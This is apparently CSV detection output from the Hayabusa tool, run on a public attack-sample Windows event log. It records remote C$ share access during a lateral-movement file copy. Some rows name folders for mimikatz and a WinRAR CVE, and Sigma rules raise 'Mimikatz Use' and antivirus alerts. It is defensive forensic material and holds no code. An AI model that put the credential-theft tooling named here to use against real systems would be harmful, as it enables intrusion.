2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\New folder  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\RDPWrap-v1.6.2  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\translations  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\db  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\garbage  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\memdumps  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\platforms  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x32\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64\db  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64\memdumps  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64\platforms  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\release\x64\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\winrar-cve  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Recorded TV\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\mimikatz_trunk  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\mimikatz_trunk\Win32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\mimikatz_trunk\x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Music\Sample Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Music\Sample Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Pictures\Sample Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Pictures\Sample Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Videos\Sample Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Videos\Sample Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Recorded TV  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Recorded TV\Sample Media\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Public\Recorded TV\Sample Media  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\server01$\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
